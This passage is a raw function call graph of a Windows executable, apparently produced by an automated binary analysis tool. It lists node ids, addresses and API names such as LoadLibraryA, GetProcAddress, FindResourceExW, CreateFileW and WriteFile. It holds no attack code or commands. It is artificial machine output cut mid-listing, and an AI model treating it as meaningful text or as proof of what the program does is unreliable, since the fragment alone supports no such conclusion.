101901->101945 101902 36b73c 305 API calls 101902->101945 101904 38049f timeGetTime 101904->101930 101905 370f4e timeGetTime 102986 369e5d 60 API calls 101905->102986 101908 3a5b8f GetExitCodeProcess 101912 3a5bbb CloseHandle 101908->101912 101913 3a5ba5 WaitForSingleObject 101908->101913 101909 369837 85 API calls 101909->101945 101910 3e5f25 111 API calls 101910->101930 101911 36b7dd 110 API calls 101911->101930 101912->101930 101913->101912 101913->101945 101916 3a5874 101916->101931 101917 3a5078 Sleep 101917->101945 101918 3a5c17 Sleep 101918->101945 101920 367de1 59 API calls 101920->101930 101924 369ea0 305 API calls 101924->101945 101930->101898 101930->101904 101930->101908 101930->101910 101930->101911 101930->101916 101930->101917 101930->101918 101930->101920 101930->101931 101930->101945 102996 3c2408 60 API calls 101930->102996 102997 369e5d 60 API calls 101930->102997 102998 3689b3 69 API calls Mailbox 101930->102998 102999 36b73c 332 API calls 101930->102999 103000 3b64da 60 API calls 101930->103000 103001 3c5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101930->103001 103002 3c3c55 66 API calls Mailbox 101930->103002 101931->101731 101932 3c9e4a 90 API calls 101932->101945 101933 3684c0 69 API calls 101933->101945 101935 369c90 59 API calls Mailbox 101935->101945 101936 3b617e 59 API calls Mailbox 101936->101945 101938 367de1 59 API calls 101938->101945 101939 3689b3 69 API calls 101939->101945 101940 3a55d5 VariantClear 101940->101945 101941 3b6e8f 59 API calls 101941->101945 101942 3a566b VariantClear 101942->101945 101943 3a5419 VariantClear 101943->101945 101944 368cd4 59 API calls Mailbox 101944->101945 101945->101877 101945->101881 101945->101883 101945->101888 101945->101889 101945->101890 101945->101891 101945->101892 101945->101893 101945->101896 101945->101897 101945->101899 101945->101901 101945->101902 101945->101905 101945->101909 101945->101924 101945->101930 101945->101931 101945->101932 101945->101933 101945->101935 101945->101936 101945->101938 101945->101939 101945->101940 101945->101941 101945->101942 101945->101943 101945->101944 102931 36e6a0 101945->102931 102962 36f460 101945->102962 102981 36e420 332 API calls 101945->102981 102982 36fce0 332 API calls 2 library calls 101945->102982 102983 3631ce IsDialogMessageW GetClassLongW 101945->102983 102990 3e6018 59 API calls 101945->102990 102991 3c9a15 59 API calls Mailbox 101945->102991 102992 3bd4f2 59 API calls 101945->102992 102993 3b60ef 59 API calls 2 library calls 101945->102993 102994 368401 59 API calls 101945->102994 102995 3682df 59 API calls Mailbox 101945->102995 101946->101701 101947->101708 101948->101721 101950 363d3e __write_nolock 101949->101950 101951 367bcc 59 API calls 101950->101951 101955 363ea4 Mailbox 101950->101955 101953 363d70 101951->101953 101961 363da6 Mailbox 101953->101961 102060 3679f2 101953->102060 101954 363e77 101954->101955 101956 367de1 59 API calls 101954->101956 101955->101752 101958 363e98 101956->101958 101957 367de1 59 API calls 101957->101961 101960 363f74 59 API calls 101958->101960 101959 3679f2 59 API calls 101959->101961 101960->101955 101961->101954 101961->101955 101961->101957 101961->101959 101962 363f74 59 API calls 101961->101962 101962->101961 102063 364bb5 101963->102063 101968 364e08 LoadLibraryExW 102073 364b6a 101968->102073 101969 39d8e6 101970 364e4a 84 API calls 101969->101970 101972 39d8ed 101970->101972 101974 364b6a 3 API calls 101972->101974 101976 39d8f5 101974->101976 102099 364f0b 101976->102099 101977 364e2f 101977->101976 101978 364e3b 101977->101978 101980 364e4a 84 API calls 101978->101980 101982 3637d4 101980->101982 101982->101759 101982->101760 101984 39d91c 102107 364ec7 101984->102107 101986 39d929 101988 380db6 Mailbox 59 API calls 101987->101988 101989 3637fb 101988->101989 101989->101773 101991 3684cb 101990->101991 101992 3684f2 101991->101992 102358 3689b3 69 API calls Mailbox 101991->102358 101992->101777 101995 363ef3 101994->101995 101996 363eda 101994->101996 101998 367bcc 59 API calls 101995->101998 101997 368047 59 API calls 101996->101997 101999 363879 101997->101999 101998->101999 102000 382efd 101999->102000 102001 382f09 102000->102001 102002 382f7e 102000->102002 102004 382f2e 102001->102004 102359 388b28 58 API calls __getptd_noexit 102001->102359 102361 382f90 60 API calls 3 library calls 102002->102361 102004->101798 102006 382f8b 102006->101798 102007 382f15 102360 388db6 9 API calls __wsopen_nolock 102007->102360 102009 382f20 102009->101798 102011 39f17c 102010->102011 102017 368ef7 102010->102017 102011->102017 102363 368bdb 59 API calls Mailbox 102011->102363 102013 369040 102362 369d3c 60 API calls Mailbox 102013->102362 102014 368ff8 102015 380db6 Mailbox 59 API calls 102014->102015 102018 368fff 102015->102018 102017->102013 102017->102014 102017->102018 102018->101826 102020 364ee5 85 API calls 102019->102020 102021 3c95ca 102020->102021 102364 3c9734 102021->102364 102024 364f0b 74 API calls 102025 3c95f7 102024->102025 102026 364f0b 74 API calls 102025->102026 102027 3c9607 102026->102027 102028 364f0b 74 API calls 102027->102028 102029 3c9622 102028->102029 102030 364f0b 74 API calls 102029->102030 102031 3c963d 102030->102031 102032 364ee5 85 API calls 102031->102032 102033 3c9654 102032->102033 102034 38571c __crtGetStringTypeA_stat 58 API calls 102033->102034 102035 3c965b 102034->102035 102036 38571c __crtGetStringTypeA_stat 58 API calls 102035->102036 102037 3c9665 102036->102037 102038 364f0b 74 API calls 102037->102038 102039 3c9679 102038->102039 102040 3c9109 GetSystemTimeAsFileTime 102039->102040 102041 3c968c 102040->102041 102042 3c96b6 102041->102042 102043 3c96a1 102041->102043 102045 3c96bc 102042->102045 102046 3c971b 102042->102046 102044 382d55 _free 58 API calls 102043->102044 102049 3c96a7 102044->102049 102370 3c8b06 116 API calls __fcloseall 102045->102370 102048 382d55 _free 58 API calls 102046->102048 102051 39d186 102048->102051 102052 382d55 _free 58 API calls 102049->102052 102050 3c9713 102053 382d55 _free 58 API calls 102050->102053 102051->101763 102054 364e4a 102051->102054 102052->102051 102053->102051 102055 364e54 102054->102055 102057 364e5b 102054->102057 102371 3853a6 102055->102371 102058 364e6a 102057->102058 102059 364e7b FreeLibrary 102057->102059 102058->101763 102059->102058 102061 367e4f 59 API calls 102060->102061 102062 3679fd 102061->102062 102062->101953 102112 364c03 102063->102112 102066 364c03 2 API calls 102069 364bdc 102066->102069 102067 364bf5 102070 38525b 102067->102070 102068 364bec FreeLibrary 102068->102067 102069->102067 102069->102068 102116 385270 102070->102116 102072 364dfc 102072->101968 102072->101969 102276 364c36 102073->102276 102076 364b8f 102078 364ba1 FreeLibrary 102076->102078 102079 364baa 102076->102079 102077 364c36 2 API calls 102077->102076 102078->102079 102080 364c70 102079->102080 102081 380db6 Mailbox 59 API calls 102080->102081 102082 364c85 102081->102082 102083 36522e 59 API calls 102082->102083 102084 364c91 _memmove 102083->102084 102085 364ccc 102084->102085 102086 364dc1 102084->102086 102087 364d89 102084->102087 102088 364ec7 69 API calls 102085->102088 102291 3c991b 95 API calls 102086->102291 102280 364e89 CreateStreamOnHGlobal 102087->102280 102094 364cd5 102088->102094 102091 364f0b 74 API calls 102091->102094 102092 364d69 102092->101977 102094->102091 102094->102092 102095 39d8a7 102094->102095 102286 364ee5 102094->102286 102096 364ee5 85 API calls 102095->102096 102097 39d8bb 102096->102097 102098 364f0b 74 API calls 102097->102098 102098->102092 102100 364f1d 102099->102100 102103 39d9cd 102099->102103 102315 3855e2 102100->102315 102104 3c9109 102335 3c8f5f 102104->102335 102106 3c911f 102106->101984 102108 364ed6 102107->102108 102109 39d990 102107->102109 102340 385c60 102108->102340 102111 364ede 102111->101986 102113 364bd0 102112->102113 102114 364c0c LoadLibraryA 102112->102114 102113->102066 102113->102069 102114->102113 102115 364c1d GetProcAddress 102114->102115 102115->102113 102119 38527c __ioinit 102116->102119 102117 38528f 102165 388b28 58 API calls __getptd_noexit 102117->102165 102119->102117 102121 3852c0 102119->102121 102120 385294 102166 388db6 9 API calls __wsopen_nolock 102120->102166 102135 3904e8 102121->102135 102124 3852c5 102125 3852db 102124->102125 102126 3852ce 102124->102126 102128 385305 102125->102128 102129 3852e5 102125->102129 102167 388b28 58 API calls __getptd_noexit 102126->102167 102150 390607 102128->102150 102168 388b28 58 API calls __getptd_noexit 102129->102168 102130 38529f __ioinit @_EH4_CallFilterFunc@8 102130->102072 102136 3904f4 __ioinit 102135->102136 102137 389c0b __lock 58 API calls 102136->102137 102147 390502 102137->102147 102138 390576 102170 3905fe 102138->102170 102139 39057d 102175 38881d 58 API calls 2 library calls 102139->102175 102142 3905f3 __ioinit 102142->102124 102143 390584 102143->102138 102176 389e2b InitializeCriticalSectionAndSpinCount 102143->102176 102146 389c93 __mtinitlocknum 58 API calls 102146->102147 102147->102138 102147->102139 102147->102146 102173 386c50 59 API calls __lock 102147->102173 102174 386cba LeaveCriticalSection LeaveCriticalSection _doexit 102147->102174 102148 3905aa EnterCriticalSection 102148->102138 102159 390627 __wopenfile 102150->102159 102151 390641 102181 388b28 58 API calls __getptd_noexit 102151->102181 102153 3907fc 102153->102151 102157 39085f 102153->102157 102154 390646 102182 388db6 9 API calls __wsopen_nolock 102154->102182 102156 385310 102169 385332 LeaveCriticalSection LeaveCriticalSection _fprintf 102156->102169 102178 3985a1 102157->102178 102159->102151 102159->102153 102159->102159 102183 3837cb 60 API calls 2 library calls 102159->102183 102161 3907f5 102161->102153 102184 3837cb 60 API calls 2 library calls 102161->102184 102163 390814 102163->102153 102185 3837cb 60 API calls 2 library calls 102163->102185 102165->102120 102166->102130 102167->102130 102168->102130 102169->102130 102177 389d75 LeaveCriticalSection 102170->102177 102172 390605 102172->102142 102173->102147 102174->102147 102175->102143 102176->102148 102177->102172 102186 397d85 102178->102186 102180 3985ba 102180->102156 102181->102154 102182->102156 102183->102161 102184->102163 102185->102153 102189 397d91 __ioinit 102186->102189 102187 397da7 102273 388b28 58 API calls __getptd_noexit 102187->102273 102189->102187 102191 397ddd 102189->102191 102190 397dac 102274 388db6 9 API calls __wsopen_nolock 102190->102274 102197 397e4e 102191->102197 102194 397df9 102275 397e22 LeaveCriticalSection __unlock_fhandle 102194->102275 102195 397db6 __ioinit 102195->102180 102198 397e6e 102197->102198 102199 3844ea __wsopen_nolock 58 API calls 102198->102199 102203 397e8a 102199->102203 102200 397fc1 102201 388dc6 __invoke_watson 8 API calls 102200->102201 102202 3985a0 102201->102202 102204 397d85 __wsopen_helper 103 API calls 102202->102204 102203->102200 102205 397ec4 102203->102205 102212 397ee7 102203->102212 102206 3985ba 102204->102206 102207 388af4 __wsopen_nolock 58 API calls 102205->102207 102206->102194 102208 397ec9 102207->102208 102209 388b28 __wsopen_nolock 58 API calls 102208->102209 102210 397ed6 102209->102210 102213 388db6 __wsopen_nolock 9 API calls 102210->102213 102211 397fa5 102214 388af4 __wsopen_nolock 58 API calls 102211->102214 102212->102211 102219 397f83 102212->102219 102215 397ee0 102213->102215 102216 397faa 102214->102216 102215->102194 102217 388b28 __wsopen_nolock 58 API calls 102216->102217 102218 397fb7 102217->102218 102220 388db6 __wsopen_nolock 9 API calls 102218->102220 102221 38d294 __alloc_osfhnd 61 API calls 102219->102221 102220->102200 102222 398051 102221->102222 102223 39805b 102222->102223 102224 39807e 102222->102224 102226 388af4 __wsopen_nolock 58 API calls 102223->102226 102225 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102224->102225 102236 3980a0 102225->102236 102227 398060 102226->102227 102229 388b28 __wsopen_nolock 58 API calls 102227->102229 102228 39811e GetFileType 102231 398129 GetLastError 102228->102231 102232 39816b 102228->102232 102230 39806a 102229->102230 102234 388b28 __wsopen_nolock 58 API calls 102230->102234 102235 388b07 __dosmaperr 58 API calls 102231->102235 102243 38d52a __set_osfhnd 59 API calls 102232->102243 102233 3980ec GetLastError 102237 388b07 __dosmaperr 58 API calls 102233->102237 102234->102215 102238 398150 CloseHandle 102235->102238 102236->102228 102236->102233 102239 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102236->102239 102240 398111 102237->102240 102238->102240 102241 39815e 102238->102241 102242 3980e1 102239->102242 102244 388b28 __wsopen_nolock 58 API calls 102240->102244 102245 388b28 __wsopen_nolock 58 API calls 102241->102245 102242->102228 102242->102233 102248 398189 102243->102248 102244->102200 102246 398163 102245->102246 102246->102240 102247 398344 102247->102200 102250 398517 CloseHandle 102247->102250 102248->102247 102249 3918c1 __lseeki64_nolock 60 API calls 102248->102249 102263 39820a 102248->102263 102251 3981f3 102249->102251 102252 397cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102250->102252 102254 388af4 __wsopen_nolock 58 API calls 102251->102254 102257 398212 102251->102257 102253 39853e 102252->102253 102255 398546 GetLastError 102253->102255 102264 3983ce 102253->102264 102254->102263 102256 388b07 __dosmaperr 58 API calls 102255->102256 102258 398552 102256->102258 102259 390add __close_nolock 61 API calls 102257->102259 102260 390e5b 70 API calls __read_nolock 102257->102260 102261 3997a2 __chsize_nolock 82 API calls 102257->102261 102257->102263 102266 3983c1 102257->102266 102269 3983aa 102257->102269 102271 3918c1 60 API calls __lseeki64_nolock 102257->102271 102262 38d43d __free_osfhnd 59 API calls 102258->102262 102259->102257 102260->102257 102261->102257 102262->102264 102263->102247 102263->102257 102265 38d886 __write 78 API calls 102263->102265 102268 3918c1 60 API calls __lseeki64_nolock 102263->102268 102264->102200 102265->102263 102267 390add __close_nolock 61 API calls 102266->102267 102270 3983c8 102267->102270 102268->102263 102269->102247 102272 388b28 __wsopen_nolock 58 API calls 102270->102272 102271->102257 102272->102264 102273->102190 102274->102195 102275->102195 102277 364b83 102276->102277 102278 364c3f LoadLibraryA 102276->102278 102277->102076 102277->102077 102278->102277 102279 364c50 GetProcAddress 102278->102279 102279->102277 102281 364ea3 FindResourceExW 102280->102281 102285 364ec0 102280->102285 102282 39d933 LoadResource 102281->102282 102281->102285 102283 39d948 SizeofResource 102282->102283 102282->102285 102284 39d95c LockResource 102283->102284 102283->102285 102284->102285 102285->102085 102287 364ef4 102286->102287 102290 39d9ab 102286->102290 102292 38584d 102287->102292 102289 364f02 102289->102094 102291->102085 102294 385859 __ioinit 102292->102294 102293 38586b 102305 388b28 58 API calls __getptd_noexit 102293->102305 102294->102293 102296 385891 102294->102296 102307 386c11 102296->102307 102297 385870 102306 388db6 9 API calls __wsopen_nolock 102297->102306 102299 385897 102313 3857be 83 API calls 5 library calls 102299->102313 102302 3858a6 102314 3858c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102302->102314 102304 38587b __ioinit 102304->102289 102305->102297 102306->102304 102308 386c21 102307->102308 102309 386c43 EnterCriticalSection 102307->102309 102308->102309 102310 386c29 102308->102310 102311 386c39 102309->102311 102312 389c0b __lock 58 API calls 102310->102312 102311->102299 102312->102311 102313->102302 102314->102304 102318 3855fd 102315->102318 102317 364f2e 102317->102104 102319 385609 __ioinit 102318->102319 102320 38564c 102319->102320 102321 38561f _memset 102319->102321 102322 385644 __ioinit 102319->102322 102323 386c11 __lock_file 59 API calls 102320->102323 102331 388b28 58 API calls __getptd_noexit 102321->102331 102322->102317 102325 385652 102323->102325 102333 38541d 72 API calls 6 library calls 102325->102333 102326 385639 102332 388db6 9 API calls __wsopen_nolock 102326->102332 102329 385668 102334 385686 LeaveCriticalSection LeaveCriticalSection _fprintf 102329->102334 102331->102326 102332->102322 102333->102329 102334->102322 102338 38520a GetSystemTimeAsFileTime 102335->102338 102337 3c8f6e 102337->102106 102339 385238 __aulldiv 102338->102339 102339->102337 102341 385c6c __ioinit 102340->102341 102342 385c7e 102341->102342 102343 385c93 102341->102343 102354 388b28 58 API calls __getptd_noexit 102342->102354 102344 386c11 __lock_file 59 API calls 102343->102344 102346 385c99 102344->102346 102356 3858d0 67 API calls 6 library calls 102346->102356 102347 385c83 102355 388db6 9 API calls __wsopen_nolock 102347->102355 102350 385ca4 102357 385cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102350->102357 102352 385cb6 102353 385c8e __ioinit 102352->102353 102353->102111 102354->102347 102355->102353 102356->102350 102357->102352 102358->101992 102359->102007 102360->102009 102361->102006 102362->102018 102363->102017 102369 3c9748 __tzset_nolock _wcscmp 102364->102369 102365 364f0b 74 API calls 102365->102369 102366 3c95dc 102366->102024 102366->102051 102367 3c9109 GetSystemTimeAsFileTime 102367->102369 102368 364ee5 85 API calls 102368->102369 102369->102365 102369->102366 102369->102367 102369->102368 102370->102050 102372 3853b2 __ioinit 102371->102372 102373 3853de 102372->102373 102374 3853c6 102372->102374 102376 386c11 __lock_file 59 API calls 102373->102376 102381 3853d6 __ioinit 102373->102381 102400 388b28 58 API calls __getptd_noexit 102374->102400 102378 3853f0 102376->102378 102377 3853cb 102401 388db6 9 API calls __wsopen_nolock 102377->102401 102384 38533a 102378->102384 102381->102057 102385 385349 102384->102385 102386 38535d 102384->102386 102446 388b28 58 API calls __getptd_noexit 102385->102446 102388 385359 102386->102388 102403 384a3d 102386->102403 102402 385415 LeaveCriticalSection LeaveCriticalSection _fprintf 102388->102402 102389 38534e 102447 388db6 9 API calls __wsopen_nolock 102389->102447 102396 385377 102420 390a02 102396->102420 102398 38537d 102398->102388 102399 382d55 _free 58 API calls 102398->102399 102399->102388 102400->102377 102401->102381 102402->102381 102404 384a50 102403->102404 102405 384a74 102403->102405 102404->102405 102406 3846e6 __fflush_nolock 58 API calls 102404->102406 102409 390b77 102405->102409 102407 384a6d 102406->102407 102448 38d886 102407->102448 102410 390b84 102409->102410 102412 385371 102409->102412 102411 382d55 _free 58 API calls 102410->102411 102410->102412 102411->102412 102413 3846e6 102412->102413 102414 3846f0 102413->102414 102415 384705 102413->102415 102583 388b28 58 API calls __getptd_noexit 102414->102583 102415->102396 102417 3846f5 102584 388db6 9 API calls __wsopen_nolock 102417->102584 102419 384700 102419->102396 102421 390a0e __ioinit 102420->102421 102422 390a1b 102421->102422 102423 390a32 102421->102423 102600 388af4 58 API calls __getptd_noexit 102422->102600 102425 390abd 102423->102425 102427 390a42 102423->102427 102605 388af4 58 API calls __getptd_noexit 102425->102605 102426 390a20 102601 388b28 58 API calls __getptd_noexit 102426->102601 102430 390a6a 102427->102430 102431 390a60 102427->102431 102434 38d206 ___lock_fhandle 59 API calls 102430->102434 102602 388af4 58 API calls __getptd_noexit 102431->102602 102432 390a65 102606 388b28 58 API calls __getptd_noexit 102432->102606 102436 390a70 102434->102436 102438 390a8e 102436->102438 102439 390a83 102436->102439 102437 390ac9 102607 388db6 9 API calls __wsopen_nolock 102437->102607 102603 388b28 58 API calls __getptd_noexit 102438->102603 102585 390add 102439->102585 102440 390a27 __ioinit 102440->102398 102444 390a89 102604 390ab5 LeaveCriticalSection __unlock_fhandle 102444->102604 102446->102389 102447->102388 102449 38d892 __ioinit 102448->102449 102450 38d89f 102449->102450 102451 38d8b6 102449->102451 102549 388af4 58 API calls __getptd_noexit 102450->102549 102453 38d955 102451->102453 102454 38d8ca 102451->102454 102555 388af4 58 API calls __getptd_noexit 102453->102555 102457 38d8e8 102454->102457 102458 38d8f2 102454->102458 102456 38d8a4 102550 388b28 58 API calls __getptd_noexit 102456->102550 102551 388af4 58 API calls __getptd_noexit 102457->102551 102476 38d206 102458->102476 102459 38d8ed 102556 388b28 58 API calls __getptd_noexit 102459->102556 102463 38d8f8 102465 38d90b 102463->102465 102466 38d91e 102463->102466 102485 38d975 102465->102485 102552 388b28 58 API calls __getptd_noexit 102466->102552 102467 38d961 102557 388db6 9 API calls __wsopen_nolock 102467->102557 102471 38d8ab __ioinit 102471->102405 102472 38d917 102554 38d94d LeaveCriticalSection __unlock_fhandle 102472->102554 102473 38d923 102553 388af4 58 API calls __getptd_noexit 102473->102553 102477 38d212 __ioinit 102476->102477 102478 38d261 EnterCriticalSection 102477->102478 102480 389c0b __lock 58 API calls 102477->102480 102479 38d287 __ioinit 102478->102479 102479->102463 102481 38d237 102480->102481 102482 38d24f 102481->102482 102558 389e2b InitializeCriticalSectionAndSpinCount 102481->102558 102559 38d28b LeaveCriticalSection _doexit 102482->102559 102486 38d982 __write_nolock 102485->102486 102487 38d9e0 102486->102487 102488 38d9c1 102486->102488 102513 38d9b6 102486->102513 102491 38da38 102487->102491 102492 38da1c 102487->102492 102569 388af4 58 API calls __getptd_noexit 102488->102569 102489 38c5f6 __call_reportfault 6 API calls 102493 38e1d6 102489->102493 102496 38da51 102491->102496 102575 3918c1 60 API calls 3 library calls 102491->102575 102572 388af4 58 API calls __getptd_noexit 102492->102572 102493->102472 102494 38d9c6 102570 388b28 58 API calls __getptd_noexit 102494->102570 102560 395c6b 102496->102560 102498 38da21 102573 388b28 58 API calls __getptd_noexit 102498->102573 102500 38d9cd 102571 388db6 9 API calls __wsopen_nolock 102500->102571 102502 38da5f 102505 38ddb8 102502->102505 102576 3899ac 58 API calls 2 library calls 102502->102576 102507 38e14b WriteFile 102505->102507 102508 38ddd6 102505->102508 102506 38da28 102574 388db6 9 API calls __wsopen_nolock 102506->102574 102511 38ddab GetLastError 102507->102511 102517 38dd78 102507->102517 102512 38defa 102508->102512 102520 38ddec 102508->102520 102511->102517 102523 38dfef 102512->102523 102525 38df05 102512->102525 102513->102489 102514 38da8b GetConsoleMode 102514->102505 102516 38daca 102514->102516 102515 38e184 102515->102513 102581 388b28 58 API calls __getptd_noexit 102515->102581 102516->102505 102518 38dada GetConsoleCP 102516->102518 102517->102513 102517->102515 102522 38ded8 102517->102522 102518->102515 102543 38db09 102518->102543 102519 38de5b WriteFile 102519->102511 102524 38de98 102519->102524 102520->102515 102520->102519 102528 38e17b 102522->102528 102529 38dee3 102522->102529 102523->102515 102530 38e064 WideCharToMultiByte 102523->102530 102524->102520 102531 38debc 102524->102531 102525->102515 102532 38df6a WriteFile 102525->102532 102526 38e1b2 102582 388af4 58 API calls __getptd_noexit 102526->102582 102580 388b07 58 API calls 2 library calls 102528->102580 102578 388b28 58 API calls __getptd_noexit 102529->102578 102530->102511 102541 38e0ab 102530->102541 102531->102517 102532->102511 102533 38dfb9 102532->102533 102533->102517 102533->102525 102533->102531 102536 38dee8 102579 388af4 58 API calls __getptd_noexit 102536->102579 102537 38e0b3 WriteFile 102540 38e106 GetLastError 102537->102540 102537->102541 102540->102541 102541->102517 102541->102523 102541->102531 102541->102537 102542 397a5e WriteConsoleW CreateFileW __putwch_nolock 102548 38dc5f 102542->102548 102543->102517 102544 3962ba 60 API calls __write_nolock 102543->102544 102545 38dbf2 WideCharToMultiByte 102543->102545 102543->102548 102577 3835f5 58 API calls __isleadbyte_l 102543->102577 102544->102543 102545->102517 102546 38dc2d WriteFile 102545->102546 102546->102511 102546->102548 102547 38dc87 WriteFile 102547->102511 102547->102548 102548->102511 102548->102517 102548->102542 102548->102543 102548->102547 102549->102456 102550->102471 102551->102459 102552->102473 102553->102472 102554->102471 102555->102459 102556->102467 102557->102471 102558->102482 102559->102478 102561 395c76 102560->102561 102563 395c83 102560->102563 102562 388b28 __wsopen_nolock 58 API calls 102561->102562 102566 395c7b 102562->102566 102564 395c8f 102563->102564 102565 388b28 __wsopen_nolock 58 API calls 102563->102565 102564->102502 102567 395cb0 102565->102567 102566->102502 102568 388db6 __wsopen_nolock 9 API calls 102567->102568 102568->102566 102569->102494 102570->102500 102571->102513 102572->102498 102573->102506 102574->102513 102575->102496 102576->102514 102577->102543 102578->102536 102579->102513 102580->102513 102581->102526 102582->102513 102583->102417 102584->102419 102608 38d4c3 102585->102608 102587 390b41 102621 38d43d 59 API calls __wsopen_nolock 102587->102621 102589 390aeb 102589->102587 102591 38d4c3 __commit 58 API calls 102589->102591 102599 390b1f 102589->102599 102590 390b49 102598 390b6b 102590->102598 102622 388b07 58 API calls 2 library calls 102590->102622 102593 390b16 102591->102593 102592 38d4c3 __commit 58 API calls 102594 390b2b CloseHandle 102592->102594 102596 38d4c3 __commit 58 API calls 102593->102596 102594->102587 102597 390b37 GetLastError 102594->102597 102596->102599 102597->102587 102598->102444 102599->102587 102599->102592 102600->102426 102601->102440 102602->102432 102603->102444 102604->102440 102605->102432 102606->102437 102607->102440 102609 38d4ce 102608->102609 102610 38d4e3 102608->102610 102623 388af4 58 API calls __getptd_noexit 102609->102623 102615 38d508 102610->102615 102625 388af4 58 API calls __getptd_noexit 102610->102625 102612 38d4d3 102624 388b28 58 API calls __getptd_noexit 102612->102624 102615->102589 102616 38d512 102626 388b28 58 API calls __getptd_noexit 102616->102626 102617 38d4db 102617->102589 102619 38d51a 102627 388db6 9 API calls __wsopen_nolock 102619->102627 102621->102590 102622->102598 102623->102612 102624->102617 102625->102616 102626->102619 102627->102617 102629 38079e __write_nolock 102628->102629 102630 38079f GetLongPathNameW 102629->102630 102631 367bcc 59 API calls 102630->102631 102632 3672bd 102631->102632 102633 36700b 102632->102633 102634 367667 59 API calls 102633->102634 102635 36701d 102634->102635 102636 364750 60 API calls 102635->102636 102637 367028 102636->102637 102638 367033 102637->102638 102639 39e885 102637->102639 102640 363f74 59 API calls 102638->102640 102644 39e89f 102639->102644 102686 367908 61 API calls 102639->102686 102642 36703f 102640->102642 102680 3634c2 102642->102680 102645 367052 Mailbox 102645->101842 102647 364ddd 136 API calls 102646->102647 102648 36688f 102647->102648 102649 39e031 102648->102649 102651 364ddd 136 API calls 102648->102651 102650 3c955b 122 API calls 102649->102650 102653 39e046 102650->102653 102652 3668a3 102651->102652 102652->102649 102654 3668ab 102652->102654 102655 39e04a 102653->102655 102656 39e067 102653->102656 102657 3668b7 102654->102657 102658 39e052 102654->102658 102659 364e4a 84 API calls 102655->102659 102660 380db6 Mailbox 59 API calls 102656->102660 102687 366a8c 102657->102687 102794 3c42f8 91 API calls _wprintf 102658->102794 102659->102658 102679 39e0ac Mailbox 102660->102679 102664 39e060 102664->102656 102665 39e260 102666 382d55 _free 58 API calls 102665->102666 102667 39e268 102666->102667 102668 364e4a 84 API calls 102667->102668 102673 39e271 102668->102673 102672 382d55 _free 58 API calls 102672->102673 102673->102672 102674 364e4a 84 API calls 102673->102674 102798 3bf7a1 90 API calls 4 library calls 102673->102798 102674->102673 102676 367de1 59 API calls 102676->102679 102679->102665 102679->102673 102679->102676 102780 36750f 102679->102780 102788 36735d 102679->102788 102795 3bf73d 59 API calls 2 library calls 102679->102795 102796 3bf65e 61 API calls 2 library calls 102679->102796 102797 3c737f 59 API calls Mailbox 102679->102797 102681 3634d4 102680->102681 102685 3634f3 _memmove 102680->102685 102683 380db6 Mailbox 59 API calls 102681->102683 102682 380db6 Mailbox 59 API calls 102684 36350a 102682->102684 102683->102685 102684->102645 102685->102682 102686->102639 102688 366ab5 102687->102688 102689 39e41e 102687->102689 102804 3657a6 60 API calls Mailbox 102688->102804 102871 3bf7a1 90 API calls 4 library calls 102689->102871 102692 366ad7 102805 3657f6 67 API calls 102692->102805 102693 39e431 102872 3bf7a1 90 API calls 4 library calls 102693->102872 102695 366aec 102695->102693 102696 366af4 102695->102696 102698 367667 59 API calls 102696->102698 102700 366b00 102698->102700 102699 39e44d 102701 366b61 102699->102701 102806 380957 60 API calls __write_nolock 102700->102806 102703 366b6f 102701->102703 102704 39e460 102701->102704 102707 367667 59 API calls 102703->102707 102706 365c6f CloseHandle 102704->102706 102705 366b0c 102708 367667 59 API calls 102705->102708 102709 39e46c 102706->102709 102710 366b78 102707->102710 102711 366b18 102708->102711 102712 364ddd 136 API calls 102709->102712 102713 367667 59 API calls 102710->102713 102714 364750 60 API calls 102711->102714 102715 39e488 102712->102715 102716 366b81 102713->102716 102717 366b26 102714->102717 102719 39e4b1 102715->102719 102722 3c955b 122 API calls 102715->102722 102809 36459b 102716->102809 102807 365850 ReadFile SetFilePointerEx 102717->102807 102873 3bf7a1 90 API calls 4 library calls 102719->102873 102721 366b52 102808 365aee SetFilePointerEx SetFilePointerEx 102721->102808 102726 39e4a4 102722->102726 102723 366b98 102727 367b2e 59 API calls 102723->102727 102729 39e4cd 102726->102729 102730 39e4ac 102726->102730 102731 366ba9 SetCurrentDirectoryW 102727->102731 102728 39e4c8 102736 366d0c Mailbox 102728->102736 102733 364e4a 84 API calls 102729->102733 102732 364e4a 84 API calls 102730->102732 102737 366bbc Mailbox 102731->102737 102732->102719 102734 39e4d2 102733->102734 102735 380db6 Mailbox 59 API calls 102734->102735 102743 39e506 102735->102743 102799 3657d4 102736->102799 102739 380db6 Mailbox 59 API calls 102737->102739 102741 366bcf 102739->102741 102740 363bbb 102740->101701 102740->101710 102742 36522e 59 API calls 102741->102742 102752 366bda Mailbox __wsetenvp 102742->102752 102744 36750f 59 API calls 102743->102744 102776 39e54f Mailbox 102744->102776 102745 366ce7 102867 365c6f 102745->102867 102748 39e740 102878 3c72df 59 API calls Mailbox 102748->102878 102749 366cf3 SetCurrentDirectoryW 102749->102736 102752->102745 102758 39e7d9 102752->102758 102764 39e7d1 102752->102764 102767 367de1 59 API calls 102752->102767 102860 36586d 67 API calls _wcscpy 102752->102860 102861 366f5d GetStringTypeW 102752->102861 102862 366ecc 60 API calls __wcsnicmp 102752->102862 102863 366faa GetStringTypeW __wsetenvp 102752->102863 102864 38363d GetStringTypeW _iswctype 102752->102864 102865 3668dc 166 API calls 3 library calls 102752->102865 102866 367213 59 API calls Mailbox 102752->102866 102753 39e762 102879 3dfbce 59 API calls 2 library calls 102753->102879 102756 39e76f 102757 382d55 _free 58 API calls 102756->102757 102757->102736 102882 3bf7a1 90 API calls 4 library calls 102758->102882 102761 39e7f2 102761->102745 102762 36750f 59 API calls 102762->102776 102881 3bf5f7 59 API calls 4 library calls 102764->102881 102767->102752 102770 367de1 59 API calls 102770->102776 102774 39e792 102880 3bf7a1 90 API calls 4 library calls 102774->102880 102776->102748 102776->102762 102776->102770 102776->102774 102874 3bf73d 59 API calls 2 library calls 102776->102874 102875 3bf65e 61 API calls 2 library calls 102776->102875 102876 3c737f 59 API calls Mailbox 102776->102876 102877 367213 59 API calls Mailbox 102776->102877 102777 39e7ab 102778 382d55 _free 58 API calls 102777->102778 102779 39e7be 102778->102779 102779->102736 102781 3675af 102780->102781 102787 367522 